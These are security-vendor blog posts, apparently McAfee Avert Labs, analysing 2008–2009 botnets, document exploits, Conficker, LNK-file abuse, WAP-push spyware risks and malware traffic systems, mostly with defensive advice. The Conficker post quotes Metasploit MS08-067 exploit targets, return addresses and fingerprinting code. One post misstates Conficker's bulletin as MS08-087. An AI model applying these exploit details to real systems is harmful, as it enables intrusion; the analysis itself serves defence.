Well, hello Donbot ! Upon investigation, the downloaded malware (MD5: 916DB2E2C2D1ED7AF89DD8EBB9C7D84C) detected generically as Generic.dx appears to be a component of an active botnet called Donbot (also known as Bachsoy). Components of Donbot typically create a proxy on infected machines and may be used to relay spam and HTTP traffic. Except for a few, most AV vendors seem to have detection for this malware.

Until recently, Donbot has been a relatively minor player in the lucrative spam business, but it certainly looks like the Donbot authors have decided to expand the potential of their botnet . While other botnets – namely Cutwail and Rustock continue to dominate the distribution of spam, Donbot is making an eager attempt to get a bigger share of the spam revenue pie as one of the top 5 most active botnets worldwide. Clearly, worm authors are focusing on growing their botnets as they might not get another chance like the MS08-067 exploit in a long time.

This would also serve as yet another reminder that there could well be many computers on the Internet that are still not installed with the latest security updates - more than 5 months since the release of the MS08-067 patch.

We’ve just seen the Microsoft Excel 0-day attacks in February. Today, Microsoft published a new Security Advisory reporting a new unpatched vulnerability in Microsoft Office PowerPoint.

McAfee Avert Labs investigated and discovered multiple attacks in the field using the PowerPoint exploit. McAfee VirusScan products detects this threat as Exploit-PPT.k trojan using the 5573 DATs to be released on the same day. 

As with most other document exploits, these PowerPoint files install malicious trojans in the background but displays an innocent PowerPoint presentation to the victim as a deceptive measure. The following list shows a variety of malware files installed in these attacks:

• fssm32.exe: 428,032 bytes (Muster.c trojan)
• IEUpd.exe : 45,056 bytes (Muster.c trojan)
• setup.exe : 13, 1072 bytes (Muster.c trojan)
• PeerCM.exe : 80,666 bytes (Generic BackDoor.u trojan)
• ws2_42.dll :10,6740 bytes (Generic BackDoor.u trojan)

Some of these specially crafted exploits arrived as PowerPoint Showfiles with the “.pps” extension. Such files typically opens in full screen mode and hides the  applications running on the desktop such as system monitoring tools that could give any clue to the dodgy installation of trojans to the victim.

Please keep your DAT files up-to-date and refrain from opening any PowerPoint files from any untrusted sources until a patch is made available by the vendor. Where possible, verify with the sender to make sure what you get is what was intended.

Everyday there are thousands of websites that have been injected with malicious code and there are millions of hosts that have been infected by malware from these malevolent URLs. The main vulnerabilities lately are Windows-based as well as third-party application issues. This blog will introduce the most common vulnerabilities used by malevolent URLs in China throughout 2008.

1. BaoFeng2 Storm
BaoFeng2 Storm is the most powerful media player used in China. The software supports multiple media formats, and its features are easy-to-use, as well as free. Multiple buffer overflow in Baofeng2 Storm allow for the downloading and execution of files. CVE Number is CVE-2007-4816.
Reference:

http://www.baofeng.com/

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4816

2. Baidu Soba
Baidu Soba is a search bar for the Internet that is integrated with a powerful MP3 search, web page search, flash search and so on. Vulnerabilities in the BaiduBar.dll in Baidu Soba have allowed for the download and execution of files via a specific link. According to the vulnerability description, the vulnerability exists in versions prior to version 5.4. CVE Number is CVE-2007-4105.
Reference:

http://bar.baidu.com

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4105

3. Xunlei Web
Xunlei Web is downloader software. Its GUI control is very browser-like. It’s important to note that people can find more and more valuable resources to download via Xunlei Web, so Xunlei Web has a great deal of customers. Buffer overflows in Xunlei Web before version 5.6.3.44 can execute arbitrary code with the vulnerability. CVE Number is CVE-2007-5064.
Reference:

http://dl.xunlei.com/index.htm

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5064

4. PPStream
PPStream is IPTV software base on p2p streaming techniques. It’s very popular in China. Buffer overflows in the PowerPlayer.dll in PPStream before version 2.0.1.3829 allow for the execution of arbitrary code via the vulnerability. Its CVE number is CVE-2007-4748.
Reference:

http://www.ppstream.com

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4748

5. OurGame Chat
OurGame is a kind of free game. It is a gaming platform that covers all the related fields and areas of network games. It has a category of nearly one hundred species of games, including Card games, leisure games, large-scale network and so on. Buffer overflows in the GLChat.ocx of the OurGame Chat module in the ConnectAndEnterRoom() method allows for the execution arbitrary code. Its CVE number is CVE-2007-5722.
Reference:

http://www.ourgame.com

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5722

6. Ultra Star Reader
Ultra Star Reader is an e-book reader tool. It’s similar to a PDF reader. Buffer overflows in the Ultra Star Reader allows for execution of arbitrary code via the vulnerability. Its CVE number is CVE-2007-5807.
Reference:

http://www.ssreader.com

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5807

7. JetAudio
JetAudio is media player with sound-effect enhancing functionality. Vulnerabilities in the JetFlExt.dll in JetAudio version 7.0.3 allows for the overwriting of arbitrary local files. Attackers can drop malware on a system via this vulnerability. Its CVE number is CVE-2007-4983.
Reference:

http://www.jetaudio.com

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4983

8. Xunlei Thunder
Xunlei Thunder is free downloader software. It supports multiple download protocols such as http, ftp and bit torrent. Buffer overflows in the pplayer.dll in Xunlei Thunder allow for the execution of arbitrary code. Its CVE number is CVE-2007-6144.
Reference:

http://www.xunlei.com

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6144

A lot has been published about Conficker already–this blog is an addendum to our previously published “W32/Conficker: Much Ado About Nothing.” Here we offer some Conficker snippets, if you will.

First off, you may be confused by the differences between the a, b, and c variants. Let’s clear this up a bit. The Conficker.worm.a and Conficker.worm.b variants use the MS08-067 vulnerability in Microsoft’s Server Service for propagation. The latest variant, Conficker.worm.c, has included significantly updated functionality. This update, while complex and clever, was performed on Conficker.worm.a and Conficker.worm.b infections–meaning that the exploit was not included in the update’s payload. SRI International has a good write-up about this as well as other technical details. (Note: You’ll get a patch you wish you didn’t get!)

The next thing you probably want to know–and what’s probably most important to you when dealing with this–is how are you going to combat this threat? Riding to the rescue we see Avert Labs Services. They have published a practical “in the trenches” document to help you identify and combat the infection.

But beyond anti-malware protection, what else can you do?

The best way is to prevent initial, or further, infection. If you have the latest variant, you were most probably hit by the Conficker.worm.a or Conficker.worm.b variants. McAfee VirusScan or our standalone Stinger utility are useful tools. If you also have a vulnerability manager and host/network IPS you may have other avenues to explore. These tools could allow you to detect any missing MS08-067 patches, prevent code execution in the event of a buffer overflow, or detect traffic from the Conficker.worm.a and Conficker.worm.b over the wire. These steps could help you shut the door on the initial infection vector. In fact, the combined additional coverage when using McAfee (formerly Foundstone) Vulnerability Manager, McAfee Host Intrusion Prevention (formerly Host IPS), and McAfee Network Security Platform (formerly IntruShield) would give you four checks, and four signatures plus generic buffer overflow protection. That’s great additional firepower.

Another good resource? The page you are currently visiting. We’ll be sure to update you as things progress.

=== Update March 31, 2009, 7pm PDT ===

It’s already April 1 in many parts of the world. And, thankfully, so far it’s been quiet on the Conficker front. If you’re scrambling to check for Conficker infection on your systems, then check out our Conficker Detection Tool. Also, remember to keep your product signatures updated!

In the run-up to April 1, the media spotlight around the latest Conficker worm variant has reached a morbid frenzy. From being touted as an “April Fool’s joke” to outrageous headlines such as “Millions of computers expected to be destroyed”–no other worm in recent history has generated this much media attention. But what have we learned from history? From the days of Michelangelo to the recent Blaster, SoBig, Sober, and Kamasutra worms, the hype surrounding the activation or payload dates of major Internet worms have turned out to be only damp squibs.

What happens on April Fool’s Day is anyone’s guess. Although we still don’t know the real intent of the authors of the Conficker worm, they have consistently improved the worm by adding new functionality and anti-debugging tricks with every released variant. In order to resist the Conficker Cabal initiative, which recently blocked domain registrations associated with previous Conficker A and B variants, the worm authors upped the randomly generated domain count from 250 to 50,000. The intent behind generating and attempting to contact so many domains is to make it extremely difficult for security researchers to monitor sites that could potentially host a payload for the Conficker worm to download and execute.

What we do know is almost all the security vendors have thoroughly analyzed Conficker–also known as Downadup and Kido worm–and have good generic detection and cleaning in place. Uploading a couple of randomly selected Conficker binaries to the VirusTotal site consistently shows an overall anti-virus detection rate of 90 percent or above. And these high detection rates are across vendors–small or big.

To prepare for any trouble on April 1, McAfee now offers a special build of its standalone cleaning tool Stinger, which will be updated on a daily basis to include any undetected Conficker variants from the wild. This special build of Stinger can be downloaded from the Avert Tools site. We’ve also posted detailed documentation on mitigation steps that security staff within organizations can take to combat W32/Conficker. Additional McAfee product coverage information for MS08-067–the Microsoft Windows Server Service vulnerability, which is exploited by the worm–can be viewed at the McAfee Threat Center.

Please ensure that your copy of Microsoft Windows is patched and your security software is fully up to date. That way you won’t end up an April Fool.

McAfee Avert Labs will now produce more detailed documentation on prevalent threat families. The “Combating Threats” document series is designed to arm security staff within organizations with more information concerning prevalent threat families as well as to provide additional mitigation steps that can be taken. The first two documents in this series, “W32/Virut Family” and “Finding W32/Conficker.worm,” are now available via our blog, prior to our “Combating Threats” web page going live.

UPDATE MARCH 17th

Apologies for the busted links yesterday. All seem to be resolving fine now.

– Update Feb 24, 10:15 PDT –
Microsoft has released a security advisory for this issue (CVE-2009-0238):
http://www.microsoft.com/technet/security/advisory/968272.mspx

Many versions of Excel are vulnerable, including 2000, 2002, 2003, 2007, 2004/2008 for Mac, Excel Viewer/Excel Viewer 2003.
 –

A Trojan exploiting an unpatched Microsoft Excel vulnerability has been reported from the field. McAfee Avert Labs has confirmed that Microsoft Excel 2007 and 2003 are affected. Other versions may also be impacted.

McAfee DAT files identify known malicious Excel spreadsheet files as Exploit-MSExcel.r Trojan, and dropped files as BackDoor-DUE Trojan in the 5534 DATs.

As with the initial Exploit-PDF.i threat, current attacks are very targeted and limited. When succesfull, it installs a backdoor that attempts to connect a remote site port 80 and waits for commands.

The mitigation for this infection is to block unknown TCP connections. However, one of the best protection methods is to remain vigilant against Excel files from untrusted sources or sent at an unexpected time until a security update is available.

The year 2009 has so far have a been hectic one for anti-virus vendors and IT administrators alike, “thanks” to two prolific malware families: W32/Conficker and W32/Virut. Malware researchers and field engineers have literally burned the midnight oil to ensure networks are protected against these threats.

Some of the organizations that were hit with these infections had the latest Microsoft updates installed but still got infected. During the post-mortem of the outbreaks, one glaring mistake stood out.

Administrators routinely attend to distress calls from users whenever they have an issue with their machines. By habit, the admins tend to log onto the affected workstation using their own accounts—which have domain-administrator privileges. For a moment, let us assume the suspicious user’s workstation was infected with W32/Conficker. What could possibly go wrong from here?

When the W32/Conficker worm infects a machine, it scans the local network and attempts to infect machines using the credentials of the currently logged-on user. If the initial login attempt fails, then the worm attempts a brute-force attack to authenticate, using a hardcoded list of passwords. Because most organizations have enforced complex password policies these days, brute-forcing is ineffective. But the moment the administrator logs onto the affected machine using his or her domain account, W32/Conficker runs using the elevated credentials of a domain administrator. Straight away the worm can infect any host on the domain using these newly acquired administrator credentials. Shown below is a traffic-capture screenshot of this behavior.

Upon copying the worm’s DLL to the System32 folder, W32/Conficker proceeds to create a scheduled job task to execute the worm at a predefined time. In a matter of minutes the entire network, with thousands of machines, gets infected.

It’s pretty much the same story with W32/Virut, a polymorphic entry-point-obscuring virus that spreads by infecting executable and script files. A machine infected with W32/Virut would scan and infect shared drives on the network using the credentials of the currently logged-on user. Because most domain users have limited write access to shared resources on the network, the infection is confined to a subset of machines. But the moment the administrator commits the cardinal sin of logging onto an infected machine, W32/Virut runs with elevated credentials and has write access to every C$ and Admin$ share on the network.

To prevent such an outbreak from happening, it is imperative that administrators refrain from logging onto a suspect machine using their own accounts. Logging on using the workstation’s local administrator account can also have the same effect; most corporate workstations are ghosted from the same image and could have the same local admin account and password.

An alternative is to use remote desktop solutions such as VNC, GoToAssist, or TeamViewer. These three are not tied to domain authentication. Once a suspect machine is identified, it should be isolated from the network for further investigation. Better safe than sorry

A new spam run is on the loose, misusing the global economic crisis as its social-engineering vector. Consumers looking for a bargain should take care, because the bad guys exactly want to fool people trying to save some money these days. Spam mails promoting bargains, which could help in the recession, are hitting the inboxes right now.

When users follow a link in such spam mails–but please don’t do that!–a website like the one below appears:

After the Valentine’s Day theme, the malware authors behind the Waledac botnet changed their lure to promote free coupons, pretending to “save” consumers a lot of money. The text states: Exclusive sale coupons and deals at over 100 000 stores in <City>, <Country>. You can find these amazing sale offers and coupons ONLY HERE! You can download free online and printable coupon list. In our list there are most popular stores, restaurants and companies in <City>, <Country> with discounts up to 95%. We help you to survive this crisis! The coupon list is named “couponslist.exe,” “sale.exe,” or “print.exe”–and, in fact, is malware.

In economically hard times, the malware authors do not rely only on clever and timely social engineering, they also include a malicious IFRAME in the website that refers to malicious code trying to exploit unpatched computers with an additional drive-by infection. Furthermore, the website is craftily designed. The bad guys are using geo-location services to better target their audience. So when someone connects to the website, it determines the geographical location on the fly and presents the actual location in the website texts. When a victim sees coupons for exactly his town, this will increase the demand for the bargain list.

As a last piece of advice we can only stress again that consumers should always take care with offers that look too good to be true–even more so in the hard times of a global economic crisis. Please also refer to our predictions for 2009 “Cybercrime, Online Threats, and the Recession.”

Needless to further remind everyone, zero-day attacks are the preferred choice of cyber criminals and will continue to be so in 2009. If the recent W32/Conficker.worm (MS08-087) and Exploit-XMLhttp.d (MS08-078, MS09-002) were not good enough to prove our point, here is another one.

At the turn of 2009, malicious PDF documents were discovered to be exploiting a 0-day vulnerability affecting Adobe Reader 8,x and 9.x. In parsing a specially crafted embedded object, a bug in the reader allowed the attacker to overwrite memory at an arbitrary location. The attacks, found in the field, use the infamous “HeapSpray” method via JavaScript to achieve control of code execution (see below):

In the above image, the eax register is specially crafted to point to the malicious shellcode that installs a trojan. When successful, the attack installs a backdoor to enforce remote control and monitoring on infected systems. Further characteristics of this backdor and detection details are posted at http://vil.nai.com/vil/content/v_153842.htm

While the distribution of this exploit thus far appears to be targeted, new variants are expected as more information is made public. As with the Conficker experience, the lack of good patch management is a very worrying trend that deserves more attention from IT security practitioners. Adobe is expected to release a patch very soon:

http://www.adobe.com/support/security/advisories/apsa09-01.html

An exploit found to be targeting a recently patched vulnerability for Internet Explorer 7 was discovered in-the-wild.  Malware crooks were quick to develop a working exploit for the vulnerability in Internet Explorer 7, which was part of the February Microsoft patch release. Microsoft rated this vulnerability critical with the possibility of a consistent exploit code. The modus operandi bears close resemblance to the zero-day attack using word documents, we blogged about in December 2008.

The attack, delivered in the form of a maliciously crafted document, is sent out to unsuspecting users. This word document contains an embedded ActiveX control which upon opening, connects to a website hosting the MS09-002 exploit.

Malware authors are always working to create new and improved ways to evade detection and control compromised machines. This time, malware authors introduced obfuscation (base64 encoding) possibly to evade easy analysis and detection.

The ActiveX control facilitates connection to the malicious website to launch and execute the MS09-002 exploit.

For those who have not patched their machines, we suggest you install the MS09-002 patch immediately. It will just be a matter of time before different variants of this exploit start circulating in the wild and become incorporated into various Do-It-Yourself web attack toolkits.

The malicious word document is detected with the current DATS as Exploit-MSWord.k and the Internet Explorer 7 exploit is detected as Exploit-XMLhttp.d / Exploit-CVE2009-0075.

Recently I bought a new cell phone: the HTC Touch Pro. Great mobile phone. Opera Mobile Web surfing is handled great. The Sprint EV-DO Rev A network is fast and it’s the most stable smart phone I’ve had so far. As a security researcher naturally I had to dig deeper into how secure this mobile phone actually is. I quickly found out things that make me wonder if the mobile handset industry has learned anything from the desktop industry as far as protecting consumers.

The first thing I did was look at the default security settings of the mobile phone. Microsoft mobile keeps the policies in the registry under HKLM\Security\Policies\Policies. These policies are also documented at http://msdn.microsoft.com/en-us/library/ms890461.aspx along with the recommended settings to use as a security baseline at http://msdn.microsoft.com/en-us/library/ms889564.aspx. The first thing I noticed is that some policy settings on my phone are, by default, different from the recommended settings. Below is the analysis on two of these changed policy settings:

SL Message Policy
Recommended Default: 2048 – SECROLE_PPG_TRUSTED
Value on HTC Touch Pro: 0000100c: 2112
Changed Value: (SECROLE_PPG_TRUSTED | SECROLE_USER_UNAUTH)

SI Message Policy
Recommended Default: 3072 – (SECROLE_PPG_AUTH | SECROLE_PPG_TRUSTED)
Value on HTC Touch Pro: 0000100d: 3136
Changed Value: (SECROLE_PPG_AUTH | SECROLE_PPG_TRUSTED | SECROLE_USER_UNAUTH)

These policy settings define WAP Push SI (Service Indication) and SL (Service Load). WAP was designed to be used by operators, administrators, and others to push software updates or even ringtones directly to the phone. For some unknown reason the HTC Touch Pro has broken from the recommended security policy and added a flag (SECROLE_USER_UNAUTH) that allows unauthenticated WAP Pushes from anyone. What does this mean? It means that an attacker can send a WAP push telling you to install spyware, like FlexiSpy, which gives them full control of your mobile handset. Once installed, the attacker can obtain your private data, your passwords, call logs, and even eavesdrop using the microphone. Sound familiar? And don’t think that it has to be a WAP push with a WAP gateway etc. That’s not the only impact these settings have. A specially crafted SMS can have the same effect as sending the WAP push through a gateway. A binary SMS message can contain a WAP SL Push (using SL as it can be used to force the downloading of spyware without user intervention or prompts) that instructs the mobile handset to go to a specific URL, get the spyware, and run the spyware after receiving it. In this case, all the attacker would need is the mobile handset phone number to send the binary SMS message to.

Further research showed that binary SMS doesn’t seem to work on Sprint’s CDMA network. Although, it is reported it does work on GSM networks such as AT&T. This makes me wonder what the default security policy is for WAP Pushes on AT&T’s version of the HTC Pro Touch, the HTC FUZE. In any case, unless you know you absolutely need this flag, set these security policies to the Microsoft recommended default value of 2048 and 3072 respectively. I use PHM Registry Editor although any registry editor for Windows Mobile can be used.

Shortcuts, or LNK files, are small binary files which have the path to an applications, sometimes with optional parameters. These files are used for running applications and are placed on folders where they are easy to access by users on such places as Desktops, and Application Launchers. The LNK files are also placed within the Startup folder to run automatically upon system boot. This indirect way of running applications is often attractive to malware authors as shortcuts have not been called out to most user’s attention for the sake of security as much as executable files have. At Avert Labs, we have recently seen some malware abusing shortcut files to launch malicious files/scripts in several different ways. Here, we introduce some methods we have recently seen:

1. Create shortcut files linking to malware files

This is an easy way to launch malware by a user’s actions or upon system reboot. These LNK files are created on the desktop, network shares, and even startup folders. One of the many variants of the Spy-Agent.bw trojan are known to take advantage of shortcuts to run.

2. Parasitic Infection to shortcuts

We have seen the W32/Mokaksu virus modify all LNK files on the desktop and add the path of the malware file to the original path.



The example above is the shortcut to Adobe Acrobat Reader infected with malware. The path to the malicious “Config.Msi.exe” (in the red box) is added before the original path “AcroRd32.exe” (in the yellow box). In the shortcut, the original path is treated as a parameter to the malware file. Upon clicking on the shortcut, the W32/Mokaksu malware runs as well as executing the original file, all while running in the background. Ultimately users only see the application which was associated with the shortcut launch, thereby making it much harder for users to notice the infection.

3. Scripts in the shortcuts

Shortcuts can often contain scripts for “cmd.exe” instead of linking to executable trojan files. The Downloader-BMF trojan is such a case.



When users click on these LNK files, the scripts silently creates and drops ftp scripts to then download vbs scripts from the ftp severs. The downloaded vbs scripts are then responsible for downloading trojan files.

In the first 2 cases, shortcuts are just ways of launching malware whereas in the last case, these LNK files are standalone malicious files in which no other malicious executable files are needed but a legit “cmd.exe”. This type of LNK files can be attached to emails or hosted on the web sites. This implies that we need to be more careful with LNK files. Users can easily check shortcuts by browsing the file property or viewing the file with a binary editor.

If you find suspicious strings, please do not run the files but rather send the files to Avert for further research.

Today, we at McAfee Avert Labs released our 2009 Threat Predictions. Amongst the findings are:

Threats Hide in the Cloud
Miscreants have also transitioned to the Internet “cloud” as their main delivery vehicle and take advantage of the attractions of Web 2.0. McAfee expects this trend to continue throughout 2009, eventually displacing more traditional vectors of malware distribution.

Personalized Threats Speak Your Language
Threats will continue to take evasive action against security measures. One example is the existence of single-use binary files, which are an attacker’s equivalent of a single-use credit card number used by consumers when shopping online. These binaries help to create a vast sea of threats, which will make it harder for victims to describe their assailants, and make it harder for defenders to catch them. Additionally, McAfee expects to see the continued expansion of malware in languages other than English. Cybercriminals have come to realize that by diversifying into a global market they can access even larger pools of valuable identity and confidential information.

Malware Targets Consumer Devices
McAfee expects increased attacks involving USB sticks and flash-memory devices used in cameras, picture frames, and other consumer electronics. This trend will continue due to the almost unregulated use of flash storage across enterprise environments as well as their popularity among consumers.

The Rogue Web and Malvertising
Last year McAfee also saw the malware underground use mainstream practices in an effort to “sell” software that was either misleading or outright fraudulent. McAfee expects this trend to continue as cybercriminals still see a lucrative market in this area.

McColo: The Effects of a Takedown
Spam traffic took a tremendous dive in volume when ISPs pulled the plug on spam host McColo Corp., the source of up to 60 percent of worldwide spam. In 2009, we will see a continued shift in organizations, from passive support of law enforcement to an active role of working collaboratively with ISPs and global Internet entities such as ICANN. Together, these organizations will shine the public light on these malicious actors and shut down their access to network and systems infrastructure.

Download the full report from our whitepaper page here.

Over the years, the window between exploit discovery to its incorporation into a worm candidate has shrunk from months, to weeks, to zero-day. This leaves administrators with very little time to schedule and deploy patches to all servers and workstations on their network. Virus authors, on the other hand, have been at the cutting edge for including exploit code in their creations whenever a critical vulnerability is reported. The chart below shows the time frame between a vulnerability being reported and how long it took for virus authors to incorporate it into a worm candidate.

The year 2007 was the only exception in recent times for a worm not exploiting any critical Microsoft vulnerability.

It’s easy for an outsider to criticize or pass judgment on a network that was hit with a zero-day worm. Spare a thought for the IT administrator; most do not have the flexibility to deploy patches immediately to the network for policy reasons. For example, the organization could be using legacy software, which could break if a new service pack was applied. And keeping these legacy applications running takes precedence over applying the latest Windows hot fixes. Most system administrators, who work in hospitals and other mission critical jobs, don’t have the luxury of doing a Windows update!

To add to these woes, every once in a while a hot fix from Microsoft breaks something in the operating system or adversely affects other applications. Once a patch is rolled out via WSUS (Windows Server Update Service) it cannot be rolled back centrally; a faulty patch from the vendor can prove costly for the organization. For these reasons administrators need more time to deploy these hot fixes in a test environment and QA them properly before deploying them to the enterprise.

So what can an administrator do in these circumstances? Relying solely on mainstream-antivirus desktop protection or firewall-style perimeter protection is insufficient to deal with today’s modern threats. The need of the hour is defense-in-depth. Administrators, who don’t have the luxury of applying patch updates, should seriously consider having a HIPS (host intrusion prevention system) installed on the end point to prevent exploit-based worm infections. Host intrusion prevention systems not only protect systems against zero-day vulnerabilities but also give administrators more time to test and deploy patches. The recent W32/Conficker.worm outbreaks could have been nipped in the bud if more organizations had chosen to protect their systems with HIPS.

Recently we got some new samples of the W32/Conficker.Worm to analyze. While investigating we found that this worm has an exploit for the recent MS08-067 vulnerability and uses the exploitation method derived from the metasploit ms08_067_netapi module to spread itself. Below is the traffic packet capture snapshot sent by the worm:

As we can see from the image above, there are some random alphanumeric characters in the packet which seem to have been generated from Rex::Text.rand_text_alpha in ms08_067_netapi.rb. And if we do a byte order conversion of data in red box above, we get 3 addresses: 0×00020408, 0×6f8917c2, 0×6f88f807, which are the internal targets of the ms08_067_netapi.rb exploit as listed below (from metasploit):

# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 English (NX)',
	{

                     'Ret'       => 0x6f88f807,
                     'DisableNX' => 0x6f8917c2,
                     'Scratch'   => 0x00020408
	}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

The latest metasploit exploit, besides including Windows XP/2003 OS’s; also includes several targets for languages such as English, Arabic, Czech, Danish, German, Greek Spanish Finnish, French, Hebrew, Japanese, Chinese, etc. The exploit module of ms08_067_netapi in metasploit also provides the “smb_fingerprint()” function to detect the Windows version information, Service Pack information and also the language information of the target OS. This makes programming the worm much easier and can cause much bigger impact. By using the exploit from the metasploit module as the code base, a virus/worm programmer only needs to implement functions for automatic downloading and spreading. We believe that this can be accomplished by an average programmer who understands the basics of exploitation and has decent programming skills. After further analysis of the traffic capture, we found that only the functions for detecting OS version and Service Pack information were embedded into this worm. Hence without the remote OS language determination ‘feature’, this worm only targets the English OS versions at the time of writing the blog.

Here is a packet capture snippet used in this malware to detect the OS version and Service Pack information:

By sending SMB session setup and request, it can detect OS information of target machine. If the OS is Windows Server 2003, then the Service Pack information will also be returned.

Since there are a huge number of Windows XP systems it’s obvious that the worm writer did not want to miss out on this pool, hence this is why the worm determines what the Service Pack level is by accessing \SRVSVC named pipe, which is similar to the method used in metasploit smb_fingerprint() function :

if (os == 'Windows XP' and sp.length == 0)
            # SRVSVC was blocked in SP2
            begin
                         smb_create("\\SRVSVC")
                         sp = 'Service Pack 0 / 1'
            rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e
                         if (e.error_code == 0xc0000022)
                                 sp = 'Service Pack 2+'
                         end
            end
end

So in this instance it’s obvious that malware/worm writers are abusing open source tools to their advantage to make their work easier.

For those who haven’t patched their machines, we suggest you install the MS08-067 patch ASAP! If you are a McAfee Host IPS or Network IPS user, we’ve verified that you are protected against this worm by our Signatures ID’s 3961 and 0×40709d00 respectively. For VirusScan users, the DAT update version 5444 has coverage to detect this worm.

Google’s code-hosting project is the latest free service to be abused by web spammers. We’ve seen one or two previously, but over the holidays the situation appears to have got much worse. They are creating lots of new projects with the following type of website on:

Clicking the image will take you to today’s fake codec download site. Repeated clicks will take you to an adult site [both NSFW, you have been warned!].

The difference between this and the MSN Spaces abuse that is now about a year old is that Google appears to automatically index code projects, so any Google-Jedi can generate a good list (Google Search–again, don’t click the links) to start with.

Or the fact that the image is linked from http://bestsextube dot net/video.gif all the time might also be useful to know. The icing on the cake, though, is the link to somewhere/in.cgi … I’ll come back to this later.

The porntube site is also host to a number of other related sites such as fake anti-anything software:

The codec download site, which is in Latvia, also hosts a number of related sites:

The Google Code project owner has a few other projects of a similar nature, too.

A year ago I blogged about MSN Spaces beta with a very similar issue… I even spoke to some very nice folks there about it, and a year later it’s still being abused by spammers [ spamhaus award. ] I trust Google would like to appear less evil and will take more decisive action. I’d suggest mashing code and safe browsing together, but it appears not to find anything wrong with the clickable links, though it did catch on after some redirection took place.

…perhaps I should start consulting on this sort of thing

Anybody suffering deja-vous? “/in.cgi should ring an alarm bell or two. If not, check out my colleague Micha’s blog on traffic management. He explains what happens to those clicks! This is campaign “6.”

Happy new year to all!

The Web’s classical social-engineering trick of the “missing video codec” tries to lure people into clicking on links or download and install an executable which pretends to be the missing application which is needed in order to watch the movie. The animated picture below is such an example: at first glance, it looks like a typically embedded video which is unable to load. The “picture” states that you’d have to click on it in order to see the movie. And here the lure begins – in this blog entry, we’ll follow it down and outline what kind of traffic management backbones are deployed for malware campaigns nowadays.

In our example the animated image is hosted on a popular blog platform and the link points to a suspicious Flash sample. As a quick analysis reveals, the Flash is compressed and additionally contains some obfuscated JavaScript code to hide its real intention. The script code redirects to another location.

The new location points to a so-called “Traffic Management System”. In this case, if you load the URL several times, the destination rotates and after too many retries you will be always redirected to the homepage of Google. The system remembers your IP address on the server-side for a certain time period. After that time, or when you just use another IP address, you will again see the redirections when visiting the URL.

The redirections are based on a typical HTTP “302 Found” response with a new location from the server where the traffic management system is installed. Another example, which also used Geo-Location, was outlined in this Avert Labs Blog post where a downloader trojan contacted such a system and based on the country, different malware binaries were downloaded.

Such traffic management systems nowadays are configured via web-based administration interfaces. Typically the links for the “incoming traffic” look like http://www.example.com/in.cgi?three or http://www.example.com/in.cgi?default where “three” or “default” stands for different campaign IDs inside the system. A typical rule could look like shown in the following picture.

The administrator is able to define rules for “incoming traffic” which results in different “outgoing traffic” based on different restrictions. For example, the Geo-Location could be used to redirect visitors from a particular country to one location while visitors from another country will be redirected to a different location – just think of localized campaigns targeted to the spoken language in these countries. So users from the United States will not be redirected to a french phishing web site and vice versa.

These traffic management systems can also use more complex rules based on network ranges and the referrer – so lets say that only visitors with a referer from Google will be redirected to a malicious web site as long as the IP address of the visitor doesn’t come from well-known network ranges belonging to security companies.

Why do that? This way, only users searching for the website will get to the malicious redirect, while the websites’ owner or administrator, who usually does not search for it but directly enters the URL into the browser, will see the normal website with no oddities. This helps the attacker to keep the infection under the radar for a longer time.

Other trafic management systems, like shown in the above picture, also feature different logins into the web interface – for the administrator, the “sellers” and the “buyers”. This particular system has different views for sellers of traffic – that is, infected web sites containing an IFRAME that points to the trafic management system -, and buyers of traffic – e.g. the people who run exploit servers and try to install malware on unpatched computers, thus looking for potential victims. Such traffic management systems can be in between the infected web sites and the exploit servers. As you can see in the above picture also payment options can be configured, so the more traffic a seller redirects to a buyer, the more money is paid. With such systems in between, the campaigns can be easily exchanged or the “traffic” can be sold to new buyers which try to install their malware.

So the classical starter, the “missing video codec” trick, can end up in quite a complex system managing modern malware campaigns. Visiting or following a malicious ressource nowadays means that you are redirected based on a complex server-side management system.

The last major event of the year has just ended: The 25th Chaos Communication Congress’ Closing Ceremony just took place. Now in its 25th year, making it one of the oldest annual IT security conferences on the planet, more than 4,000 visitors crowded the BCC in Berlin, making it difficult to get into the talks, much like at Defcon some years ago.

For the talks: As always there was a healthy mix of technical, culture, and society-related topics (the full schedule can be found here;) surprising was the low number of local speakers talking about security problems or releasing tools. This may be related to a lot of confusion about the impact of recent German legislation banning “hackertools.” Recordings of all talks will eventually be available here.

Some of the highlights of the conference (yes, with four days and three parallel tracks I’m certainly missing some that should be mentioned) were Security Failures in Smart Card Payment Systems, by Steven Murdoch; Fabian Yamaguchi’s talk about TCP DoS Vulnerabilities; SWF and the Malware Tragedy, by BeF and fukami; FX of Phenoelit talking about the State of Attack/Defense of Routers (start watching your infrastructure, folks!) and finaly the conference highlight, a talk about creating a rogue CA Certificate, by David Molnar, Marc Stevens, Benne de Weger, Arjen Lenstra, Dag Arne Oswig, Jacob Appelbaum, and Alex Sotirov. By taking advantage of known (and widely ignored) weaknesses of md5-signed certificates and bad implementation of a CA, they were able to create a Rogue CA Certificate, trusted by all browsers–OUCH!

A very interesting note concerning the Rogue CA talk: They didn’t give out any details on what they were planing to talk about until just before the talk itself. As they were afraid that someone or some company might try to gag them and prevent the talk from happening, they were discussing the content with affected parties only under NDA. Meaning: They made the other party sign the NDA, not the other, usual, way around!

This year there were a number of talks about mobile phone (in)security and about the GSM network in general, an interesting trend to follow in the next months/years. And at the very end a vulnerability affecting many Symbian-based phones, trivial to exploit manually, had been released: SMSCurse (I’ve got no working link at the time of this writing). It basically crashes the SMS messaging on a phone and may require factory reset to restore it, depending on the phone.

I took this as an opportunity to create a current backup of my phone–how old is your latest backup?

Have a Happy and Safe New Year!

Recently we blogged about an unpatched Internet Explorer 7 exploit in the wild. With the vulnerability information made public, McAfee Avert Labs has noticed a spike in the number of active websites hosting this exploit. Lately we are seeing customized versions of the IE 7 exploit with varying degrees of obfuscation.

